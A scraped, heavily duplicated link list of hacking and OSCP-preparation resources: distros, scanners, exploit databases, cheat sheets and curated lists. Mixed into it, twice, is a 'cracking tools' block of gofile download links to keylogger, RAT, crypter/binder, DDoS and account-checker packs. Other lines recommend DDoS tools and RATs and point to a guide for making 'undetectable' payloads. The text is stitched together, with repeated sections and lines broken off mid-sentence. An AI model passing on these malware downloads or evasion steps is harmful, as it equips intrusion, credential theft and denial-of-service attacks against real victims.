#General/Basic Exploitation
############################
www.pentest-standard.org
www.offensive-security.com
null-byte.wonderhowto.com
www.owasp.org
github.com
github.com
portswigger.net
www.metasploit.com
exploitpack.com
github.com
github.com
#Distros
############################
www.kali.org
www.blackarch.org
www.parrotsec.org
#Vulnscanner/Sniffer/Tools/Web Exploitation
############################
pastebin.com
www.tenable.com
www.rapid7.com
cirt.net
nmap.org
github.com
www.wireshark.org
github.com
github.com
networksecuritytoolkit.org
github.com
github.com
www.netsparker.com
#Password Cracker
############################
hashcat.net
#Online Tools
############################
#Exploits (Exploit/Vulnerability Databases)
############################
exploit-db.com
github.com
nvd.nist.gov
www.us-cert.gov
seclists.org
packetstormsecurity.com
www.securiteam.com
#Payloads/Reverse Shells
############################
highon.coffee
#CTF
############################
www.vulnhub.com
#Info/Blogs/Techniques/etc
############################
wiki.bash-hackers.org
www.corelan.be
www.veracode.com
www.thegeekstuff.com
blog.g0tmi1k.com
thehackernews.com
#Lists
############################
tools.kali.org
sectools.org
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
github.com
Awesome OSCP collection:
OSCP Buffer overflow concepts and tutorials
OSCP Cheatsheets:)
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
github.com
github.com
OSCP methodology:-
paper.dropbox.com
github.com
blog.g0tmi1k.com
github.com
github.com
johnjhacking.com
*
All about OSCP*
Offensive Security Certified Professional is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included with the Kali Linux distribution.
OSCP Buffer overflow concepts and tutorials
OSCP Cheatsheets:)
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
github.com
github.com
OSCP methodology:-
paper.dropbox.com
github.com
blog.g0tmi1k.com
github.com
github.com
johnjhacking.com
OSCP Experience
This are the blogs I have found that have given me a good direction to start as I prepared for the course
www.hacksplaining.com
www.abatchy.com
MASSIVE UPDATE IN OUR CRACKING TOOLS LINKS (UPDATED):
=============================================================
GOFILE LINKS:
KEYLOGGERS PACK (15 FILES) https://gofile.io/d/1fkilp
HACKING SOFTWARE PACK https://gofile.io/d/jcXwKR
DORKERS (11 FILES) https://gofile.io/d/9vkTYm
DDOS - DDOSER Tools https://gofile.io/d/oQtD3a
Crypto Bots - Utilities - Btc TOOLS https://gofile.io/d/I0J1YK
CRYPTERS & BINDERS (31 FILES) https://gofile.io/d/2ouLVc
Checkers PACK https://gofile.io/d/Nb84y2
BLACKBULLET (04 FILES) https://gofile.io/d/bQoWFF
BASIC TOOLS & UTILITIES PACK https://gofile.io/d/1C4WYH
Windows Software Releases https://gofile.io/d/4YdhUR
Vulnerable Scanners PACK https://gofile.io/d/MVNwsh
SQLi TOOLS PACK (14 FILES) https://gofile.io/d/VPZQza
SEO Tools & Utilities - SEARCH ENGINE OPTIMIZATION https://gofile.io/d/mR9KBk
RATS PACK https://gofile.io/d/GEzIeU
PROXY TOOLS & CHECKERS & GRABBERS (44 FILES) https://gofile.io/d/mpPCZB
www.techexams.net
The Basics - Start Here
these are the resources I used to get more comfortable with linux, scripting, TCP/IP, etc. I recommend starting with these especially if you dont have much/any experience
pentesterlab.com
www.cybrary.it
Metasploit
although it has been said that Metasploit use is limited during the exam, Offensive Security recommends getting more familiar with Metasploit. I have been going through the metasploit unleashed course its really good info, i would be suprised if I dont have to come back to this repeatedly
www.offensive-security.com
Linux Exploitation
sploitfun.wordpress.com
Privilege Escalation - Linux
blog.g0tmi1k.com
TCPDump
danielmiessler.com
Buffer Overflows
Enumeration
null-byte.wonderhowto.com
Cheat Sheets for All the Things!!!!!!!
www.sans.org
highon.coffee
www.tunnelsup.com
www.tunnelsup.com
Reverse and Bind Shell tutorials
resources.infosecinstitute.com
Text Editor Cheat Sheets
ALL ABOUT PAYLOAD 2021
telegra.ph
ā¬ā¬ā¬ā%99
CYBERSEC EBOOKS 2021
Exploit search engine
sploitus.com
MITM:
ā¤ SSLstrip ( https://github.com/moxie0/sslstrip )
ā¤ Ettercap ( https://www.ettercap-project.org )
ā¤ Driftnet ( https://github.com/deiv/driftnet )
ā¤ DSniff ( https://sectools.org/tool/dsniff/ )
SQL Injection:
ā¤ SQLMAP ( https://github.com/sqlmapproject/sqlmap )
ā¤ Uniscan ( https://github.com/poerschke/Uniscan )
ā¤ W3af ( https://github.com/andresriancho/w3af/ )
ā¤ Nikto ( https://github.com/sullo/nikto )
Virusses(Backdoor's nothing special here):
ā¤ Metasploit ( https://github.com/rapid7/metasploit-framework )
ā¤ Shellter ( https://www.shellterproject.com )
Cracking:
ā¤ John the ripper ( https://www.openwall.com/john/ )
ā¤ Hydra ( https://sectools.org/tool/hydra/ )
ā¤ Aircrack ( https://www.aircrack-ng.org )
DDos tools:
We have a few shells that supports stressing nothing special. And i can recommend:
ā¤ TorsHammer ( https://github.com/dotfighter/torshammer )
ā¤ GoldenEye ( https://github.com/jseidl/GoldenEye )
ā¤ Hping3 ( hping.org )
ā¤ Pyloris ( https://motoma.io/pyloris/ )
ā¤ HULK ( https://github.com/grafov/hulk )
ā¤ Blacknurse ( https://github.com/opsxcq/exploit-blacknurse )
XSS:
ā¤ BEef ( https://beefproject.com )
Info-gathering/portscanners:
ā¤ Nmap ( https://nmap.org/download-html )
ā¤ Zenmap ( https://nmap.org/zenmap/ )
Virusses/rat's general backdoors:
ā¤ Thefatrat ( https://github.com/Screetsec/TheFatRat )
ā¤ Nanocore ( No Download Available Find Manually )
Other Tools:
ā¤ Commix ( https://github.com/commixproject/commix )
ā¤ Wifite ( https://github.com/derv82/wifite2 )
ā¤ Ghostphisher ( https://github.com/savio-code/ghost-phisher )
Awesome OSCP collection:
OSCP Buffer overflow concepts and tutorials
OSCP Cheatsheets:)
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
github.com
github.com
OSCP methodology:-
paper.dropbox.com
github.com
blog.g0tmi1k.com
github.com
github.com
johnjhacking.com
1. Quasar RAT
sfkino.tistory.com
2. Anti-virus artifacts. Listing APIs hooked by: Avira, BitDefender, F-Secure, MalwareBytes, Norton, TrendMicro, WebRoot
github.com
1. DarkHotel APT attack
2. Warzone RAT
blogs.blackberry.com
1. NginRAT parasite targets Nginx
2. SpyAgent malware
www.trendmicro.com
1. Android APT spyware, targeting Middle East victims, enhances evasiveness
2. RATDispenser:
Stealthy JavaScript Loader Dispensing RATs into the Wild
Automate payload development, testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike
github.com
############################
The Penetration Testing Execution Standard
Metasploit Unleashed - Free Online Ethical Hacking Course
Metasploit Unleashed (MSFU) is a Free Online Ethical Hacking Course by Offensive Security, which benefits Hackers for Charity. Learn how to use Metasploit.
www.offensive-security.com
Metasploit Basics Ā« Null Byte :: WonderHowTo
Wonder How To is your guide to free how to videos on the Web. Search, Browse and Discover the best how to videos across the web using the largest how to video index on the web. Watch the best online video instructions, tutorials, & How-Tos for free. Have your own how to videos? Submit them to...
null-byte.wonderhowto.com
OWASP Foundation, the Open Source Foundation for Application Security | OWASP Foundation
OWASP Foundation, the Open Source Foundation for Application Security on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.
GitHub - nixawk/pentest-wiki: PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.
PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others. - GitHub - nixawk/pentest-wiki: PENTEST-WIKI is a free o...
github.com
GitHub - beefproject/beef: The Browser Exploitation Framework Project
The Browser Exploitation Framework Project. Contribute to beefproject/beef development by creating an account on GitHub.
github.com
Burp Suite - Application Security Testing Software
Get Burp Suite. The class-leading vulnerability scanning, penetration testing, and web app security platform. Try for free today.
Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit
Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the world's best penetration testing software now.
Exploit Pack
Exploit Pack is an advanced multiplatform exploitation framework including zero-days, 39.500+ exploits, post-exploitation modules and the latest real-world adversary simulations
GitHub - commixproject/commix: Automated All-in-One OS Command Injection Exploitation Tool.
Automated All-in-One OS Command Injection Exploitation Tool. - GitHub - commixproject/commix: Automated All-in-One OS Command Injection Exploitation Tool.
github.com
GitHub - threat9/routersploit: Exploitation Framework for Embedded Devices
Exploitation Framework for Embedded Devices. Contribute to threat9/routersploit development by creating an account on GitHub.
github.com
#Distros
############################
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
www.kali.org
BlackArch Linux - Penetration Testing Distribution
BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers.
Parrot Security
www.parrotsec.org
#Vulnscanner/Sniffer/Tools/Web Exploitation
############################
decrypt_cipher.sh - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
#1 Vulnerability Assessment Solution Nessus Professional
Nessus Pro: The most widely deployed vulnerability assessment solution for identifying vulnerabilities, misconfigurations and out-of-compliance settings.
Nexpose On-Premise Vulnerability Scanner - Rapid7
Learn about Rapid7's on-prem vulnerability scanning tool, Nexpose. See how our vulnerability scanner prioritizes vulnerabilities and speeds up remediation.
Nikto2 | CIRT.net
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
nmap.org
GitHub - netsniff-ng/netsniff-ng: A Swiss army knife for your daily Linux network plumbing.
A Swiss army knife for your daily Linux network plumbing. - GitHub - netsniff-ng/netsniff-ng: A Swiss army knife for your daily Linux network plumbing.
github.com
Wireshark Ā· Go Deep
Wireshark: The world's most popular network protocol analyzer
GitHub - fwaeytens/dnsenum: dnsenum is a perl script that enumerates DNS information
dnsenum is a perl script that enumerates DNS information - GitHub - fwaeytens/dnsenum: dnsenum is a perl script that enumerates DNS information
github.com
GitHub - makefu/dnsmap: fork of http://code.google.com/p/dnsmap/source/checkout
fork of http://code.google.com/p/dnsmap/source/checkout - GitHub - makefu/dnsmap: fork of http://code.google.com/p/dnsmap/source/checkout
github.com
Network Security Toolkit (NST 36)
GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe. - GitHub - SamJoan/droopescan: A plugin-based scanner that aids secu...
github.com
GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner.
w3af: web application attack and audit framework, the open source web vulnerability scanner. - GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vul...
github.com
Invicti (formerly Netsparker) | Web Application Security For Enterprise
Get accurate, automated application security testing that scales like no other solution. Secure 1000s of web assets with less manual effort. Reduce your risk with the onlyā¦
www.netsparker.com
#Password Cracker
############################
John the Ripper password cracker
A fast password cracker for Unix, macOS, Windows, DOS, BeOS, and OpenVMS
www.openwall.com
hashcat - advanced password recovery
World's fastest and most advanced password recovery utility
#Online Tools
############################
CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
Crackstation is the most effective hash cracking service. We crack: MD5, SHA1, SHA2, WPA, and much more...
crackstation.net
#Exploits (Exploit/Vulnerability Databases)
############################
OffSecās Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
GitHub - InteliSecureLabs/Linux_Exploit_Suggester: Linux Exploit Suggester; based on operating system release number
Linux Exploit Suggester; based on operating system release number - GitHub - InteliSecureLabs/Linux_Exploit_Suggester: Linux Exploit Suggester; based on operating system release number
github.com
NVD - Home
nvd.nist.gov
Home Page | CISA
www.us-cert.gov
Full Disclosure Mailing List
SecLists.org archive for the Full Disclosure mailing list: A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some...
seclists.org
Security Advisories and Bulletins
technet.microsoft.com
Security Advisories and Bulletins
technet.microsoft.com
Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
Vulnerability Security Testing & DAST | Fortra's Beyond Security
Secure your applications and networks with the industry's only network vulnerability scanner to combine SAST, DAST and mobile security.
www.securiteam.com
CXSECURITY.COM Free Security List
CXSECURITY (Independent information about security) is a huge collection of information on data communications safety. Its main objective is to inform about errors in various applications.
cxsecurity.com
VULNERABILITY LAB - SECURITY VULNERABILITY RESEARCH LABORATORY - Best Independent Bug Bounty Programs, Responsible Disclosure & Vulnerability Coordination Platform - INDEX
VULNERABILITY LAB - SECURITY VULNERABILITY RESEARCH LABORATORY - Best Independent Bug Bounty Programs, Responsible Disclosure & Vulnerability Coordination Platform
www.vulnerability-lab.com
#Payloads/Reverse Shells
############################
Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC, JSP, Java, Perl
Reverse Shell Cheat Sheet (2022), a list of reverse shells for connecting back on Linux/Windows with PHP, Python, Powershell, nc (Netcat), JSP, Java, Bash, PS etc.
#CTF
############################
Vulnerable By Design ~ VulnHub
VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
#Info/Blogs/Techniques/etc
############################
bash-hackers.org - Diese Website steht zum Verkauf! - Informationen zum Thema bash hackers.
Diese Website steht zum Verkauf! bash-hackers.org ist die beste Quelle fĆ¼r alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu speziellen Sachverhalten, finden Sie auf bash-hackers.org alles. Wir hoffen, dass Sie hier das Gesuchte finden!
wiki.bash-hackers.org
Articles | Corelan Cybersecurity Research
This is a hand-picked list of blog posts that belong together / are related to each other : ###articles###
What is Cross-Site Scripting? XSS Cheat Sheet | Veracode
What is cross-site scripting (XSS)? Learn what XSS injection is and best practices for cross-site scripting prevention. See how Veracode can help today!
XSS Attack Examples (Cross-Site Scripting Attacks)
In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks. XSS stands for Cross Site Scripting. XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by...
Basic Linux Privilege Escalation - g0tmi1k
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a
blog.g0tmi1k.com
The Hacker News | #1 Trusted Cybersecurity News Site
The Hacker News is the most trusted and popular cybersecurity publication for information security professionals seeking breaking news, actionable insights and analysis.
thehackernews.com
#Lists
############################
Kali Tools | Kali Linux Tools
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
tools.kali.org
SecTools.Org Top Network Security Tools
Rankings and reviews of computer and network security software, programs, and tools.
sectools.org
GitHub - fffaraz/awesome-cpp: A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny things. Inspired by awesome-... stuff.
A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny things. Inspired by awesome-... stuff. - GitHub - fffaraz/awesome-cpp: A curated list of awesome C++ (or C) framewor...
github.com
GitHub - fffaraz/awesome-cpp: A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny things. Inspired by awesome-... stuff.
A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny things. Inspired by awesome-... stuff. - GitHub - fffaraz/awesome-cpp: A curated list of awesome C++ (or C) framewor...
github.com
GitHub - alebcay/awesome-shell: A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.
A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php. - GitHub - alebcay/awesome-shell: A curated list of awesome command-line frameworks, toolkit...
github.com
GitHub - dreikanter/ruby-bookmarks: Ruby and Ruby on Rails bookmarks collection
Ruby and Ruby on Rails bookmarks collection. Contribute to dreikanter/ruby-bookmarks development by creating an account on GitHub.
github.com
GitHub - sorrycc/awesome-javascript: š¢ A collection of awesome browser-side JavaScript libraries, resources and shiny things.
š¢ A collection of awesome browser-side JavaScript libraries, resources and shiny things. - GitHub - sorrycc/awesome-javascript: š¢ A collection of awesome browser-side JavaScript libraries, resour...
github.com
GitHub - sindresorhus/awesome-nodejs: Delightful Node.js packages and resources
:zap: Delightful Node.js packages and resources. Contribute to sindresorhus/awesome-nodejs development by creating an account on GitHub.
github.com
GitHub - dloss/python-pentest-tools: Python tools for penetration testers
Python tools for penetration testers. Contribute to dloss/python-pentest-tools development by creating an account on GitHub.
github.com
GitHub - ashishb/android-security-awesome: A collection of android security related resources
A collection of android security related resources - GitHub - ashishb/android-security-awesome: A collection of android security related resources
github.com
GitHub - bayandin/awesome-awesomeness: A curated list of awesome awesomeness
A curated list of awesome awesomeness. Contribute to bayandin/awesome-awesomeness development by creating an account on GitHub.
github.com
GitHub - paragonie/awesome-appsec: A curated list of resources for learning about application security
A curated list of resources for learning about application security - GitHub - paragonie/awesome-appsec: A curated list of resources for learning about application security
github.com
GitHub - apsdehal/awesome-ctf: A curated list of CTF frameworks, libraries, resources and softwares
A curated list of CTF frameworks, libraries, resources and softwares - GitHub - apsdehal/awesome-ctf: A curated list of CTF frameworks, libraries, resources and softwares
github.com
GitHub - carpedm20/awesome-hacking: A curated list of awesome Hacking tutorials, tools and resources
A curated list of awesome Hacking tutorials, tools and resources - GitHub - carpedm20/awesome-hacking: A curated list of awesome Hacking tutorials, tools and resources
github.com
GitHub - paralax/awesome-honeypots: an awesome list of honeypot resources
an awesome list of honeypot resources. Contribute to paralax/awesome-honeypots development by creating an account on GitHub.
github.com
GitHub - clowwindy/Awesome-Networking: A curated list of awesome networking libraries, resources and shiny things
A curated list of awesome networking libraries, resources and shiny things - GitHub - clowwindy/Awesome-Networking: A curated list of awesome networking libraries, resources and shiny things
github.com
GitHub - onlurking/awesome-infosec: A curated list of awesome infosec courses and training resources.
A curated list of awesome infosec courses and training resources. - GitHub - onlurking/awesome-infosec: A curated list of awesome infosec courses and training resources.
github.com
GitHub - rshipp/awesome-malware-analysis: Defund the Police.
Defund the Police. Contribute to rshipp/awesome-malware-analysis development by creating an account on GitHub.
github.com
GitHub - caesar0301/awesome-pcaptools: A collection of tools developed by other researchers in the Computer Science area to process network traces. All the right reserved for the original authors.
A collection of tools developed by other researchers in the Computer Science area to process network traces. All the right reserved for the original authors. - GitHub - caesar0301/awesome-pcaptools...
github.com
GitHub - sbilly/awesome-security: A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.
A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - GitHub - sbilly/awesome-security: A collection of awesome software, libraries, documents,...
github.com
GitHub - sindresorhus/awesome: š Awesome lists about all kinds of interesting topics
š Awesome lists about all kinds of interesting topics - GitHub - sindresorhus/awesome: š Awesome lists about all kinds of interesting topics
github.com
Awesome OSCP collection:
OSCP Buffer overflow concepts and tutorials
Manh-Dung Nguyen - OSCP/OSCE Buffer Overflows Exploitation
Tutorials / Methodologies https://github.com/gh0x0st/Buffer_Overflow https://infosecsanyam261.gitbook.io/tryharder/buffer-overflow https://blog.own.sh/introd...
strongcourage.github.io
OSCP Cheatsheets:)
GitHub - slyth11907/Cheatsheets: Helped during my OSCP lab days.
Helped during my OSCP lab days. Contribute to slyth11907/Cheatsheets development by creating an account on GitHub.
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
GitHub - rewardone/OSCPRepo: A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'Bookm
A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmark...
github.com
GitHub - 0x4D31/awesome-oscp: A curated list of awesome OSCP resources
A curated list of awesome OSCP resources. Contribute to 0x4D31/awesome-oscp development by creating an account on GitHub.
github.com
OSCP methodology:-
Login - Dropbox
Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe.
GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
github.com
Basic Linux Privilege Escalation - g0tmi1k
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a
blog.g0tmi1k.com
redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam. - redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
github.com
GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam
A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam - GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into i...
github.com
The Ultimate OSCP Preparation Guide [DEPRECATED]
An organized guide to highlight some of the smartest techniques and resources for your OSCP journey. DEPRECATED: 12/28/2022
johnjhacking.com
*
All about OSCP*Offensive Security Certified Professional is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included with the Kali Linux distribution.
OSCP Buffer overflow concepts and tutorials
Manh-Dung Nguyen - OSCP/OSCE Buffer Overflows Exploitation
Tutorials / Methodologies https://github.com/gh0x0st/Buffer_Overflow https://infosecsanyam261.gitbook.io/tryharder/buffer-overflow https://blog.own.sh/introd...
strongcourage.github.io
OSCP Cheatsheets:)
GitHub - slyth11907/Cheatsheets: Helped during my OSCP lab days.
Helped during my OSCP lab days. Contribute to slyth11907/Cheatsheets development by creating an account on GitHub.
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
GitHub - rewardone/OSCPRepo: A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'Bookm
A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmark...
github.com
GitHub - 0x4D31/awesome-oscp: A curated list of awesome OSCP resources
A curated list of awesome OSCP resources. Contribute to 0x4D31/awesome-oscp development by creating an account on GitHub.
github.com
OSCP methodology:-
Login - Dropbox
Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe.
GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
github.com
Basic Linux Privilege Escalation - g0tmi1k
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a
blog.g0tmi1k.com
redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam. - redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
github.com
GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam
A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam - GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into i...
github.com
The Ultimate OSCP Preparation Guide [DEPRECATED]
An organized guide to highlight some of the smartest techniques and resources for your OSCP journey. DEPRECATED: 12/28/2022
johnjhacking.com
OSCP Experience
This are the blogs I have found that have given me a good direction to start as I prepared for the course
Hacksplaining: Web Security for Developers
The best protection against being hacked is well-informed developers. Make your development team into security experts today.
www.hacksplaining.com
abatchy's blog | Posts Tagged āoscpā
MASSIVE UPDATE IN OUR CRACKING TOOLS LINKS (UPDATED):
=============================================================
GOFILE LINKS:
KEYLOGGERS PACK (15 FILES) https://gofile.io/d/1fkilp
HACKING SOFTWARE PACK https://gofile.io/d/jcXwKR
DORKERS (11 FILES) https://gofile.io/d/9vkTYm
DDOS - DDOSER Tools https://gofile.io/d/oQtD3a
Crypto Bots - Utilities - Btc TOOLS https://gofile.io/d/I0J1YK
CRYPTERS & BINDERS (31 FILES) https://gofile.io/d/2ouLVc
Checkers PACK https://gofile.io/d/Nb84y2
BLACKBULLET (04 FILES) https://gofile.io/d/bQoWFF
BASIC TOOLS & UTILITIES PACK https://gofile.io/d/1C4WYH
Windows Software Releases https://gofile.io/d/4YdhUR
Vulnerable Scanners PACK https://gofile.io/d/MVNwsh
SQLi TOOLS PACK (14 FILES) https://gofile.io/d/VPZQza
SEO Tools & Utilities - SEARCH ENGINE OPTIMIZATION https://gofile.io/d/mR9KBk
RATS PACK https://gofile.io/d/GEzIeU
PROXY TOOLS & CHECKERS & GRABBERS (44 FILES) https://gofile.io/d/mpPCZB
TechExams Community
Welcome to the TechExams Community! We're proud to offer IT and security pros like you access to one of the largest IT and security certification forums on the web. Whether you stopped by for certification tips or the networking opportunities, we hope to see you online again soon. TechExams is...
Try Harder! An OSCP Review.
Offensive security OSCP Review, PWK, Penetration testing with Kali Linux, OSCP Review, OSCP Exam, Offsec, metasploit, OSCP certification
www.jasonbernier.com
The Basics - Start Here
these are the resources I used to get more comfortable with linux, scripting, TCP/IP, etc. I recommend starting with these especially if you dont have much/any experience
PentesterLab: PentesterLab: Bootcamp
Basic TCP/IP networking reference guide - Linux tutorial from PenguinTutor
Guide to user admin commands under Linux
www.penguintutor.com
Advanced Penetration Testing Course, Learn Online Security Training
Take the Cybrary Advanced Penetration Testing course by Georgia Weidman. Learn pentesting from the experts. Why wait? Start today!
www.cybrary.it
Metasploit
although it has been said that Metasploit use is limited during the exam, Offensive Security recommends getting more familiar with Metasploit. I have been going through the metasploit unleashed course its really good info, i would be suprised if I dont have to come back to this repeatedly
Metasploit Unleashed - Free Online Ethical Hacking Course
Metasploit Unleashed (MSFU) is a Free Online Ethical Hacking Course by Offensive Security, which benefits Hackers for Charity. Learn how to use Metasploit.
www.offensive-security.com
Linux (x86) Exploit Development Series
First of all I would like to thank phrack articles, its author and other security researchers for teaching me about different exploit techniques, without whom none of the posts would have been possā¦
sploitfun.wordpress.com
Privilege Escalation - Linux
Basic Linux Privilege Escalation - g0tmi1k
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a
blog.g0tmi1k.com
A tcpdump Tutorial with Examples ā 50 Ways to Isolate Traffic
50 tcpdump examples that get you maximum results in minimum time. Slice by IP, port, protocol, and application!
Enumeration
Hack Like a Pro: Reconnaissance with Recon-Ng, Part 1 (Getting Started)
Welcome back, my novice hackers! As many of you know, recon is crucial to a successful hack/pentest. In most cases, hackers spend more time doing good reconnaissance than actually hacking. Without proper recon, you are simply guessing at what type of approach or exploit is going to work and, as...
null-byte.wonderhowto.com
Cheat Sheets for All the Things!!!!!!!
Cyber Security Resources | SANS Institute
A collection of cybersecurity resources along with helpful links to SANS websites, web content and free cybersecurity resources.
www.sans.org
Nmap Cheat Sheet: Commands & Examples (2023)
Nmap Cheat Sheet, what is Namp, what does it do and how to use the tool using practical command examples.
Python Cheat Sheet - TunnelsUP
Need a quick cheat sheet for using the Python programming language? Here is a quick reference guide. Download: [PNG Image] - [PDF File]
Metasploit Cheat Sheet and Video - TunnelsUP
Need a quick handy reference guide for Metasploit? Iāve put together a bunch of the most common commands in a cheat sheet style for quick ā¦
ICMP reverse shell | Infosec Resources
What are shells? Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like
resources.infosecinstitute.com
ALL ABOUT PAYLOAD 2021Create Undetectable Payload
Requirements : Linux Distrubtion of you choice. TheFatRat Metasploit Fatrat installation.....Installation Instructions on how to install TheFatRat git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh Update cd TheFatRat ./update && chmod +x setup.sh...
telegra.ph
CYBERSEC EBOOKS 2021Exploit search enginesploitus.com
MITM:
ā¤ SSLstrip ( https://github.com/moxie0/sslstrip )
ā¤ Ettercap ( https://www.ettercap-project.org )
ā¤ Driftnet ( https://github.com/deiv/driftnet )
ā¤ DSniff ( https://sectools.org/tool/dsniff/ )
SQL Injection:
ā¤ SQLMAP ( https://github.com/sqlmapproject/sqlmap )
ā¤ Uniscan ( https://github.com/poerschke/Uniscan )
ā¤ W3af ( https://github.com/andresriancho/w3af/ )
ā¤ Nikto ( https://github.com/sullo/nikto )
Virusses(Backdoor's nothing special here):
ā¤ Metasploit ( https://github.com/rapid7/metasploit-framework )
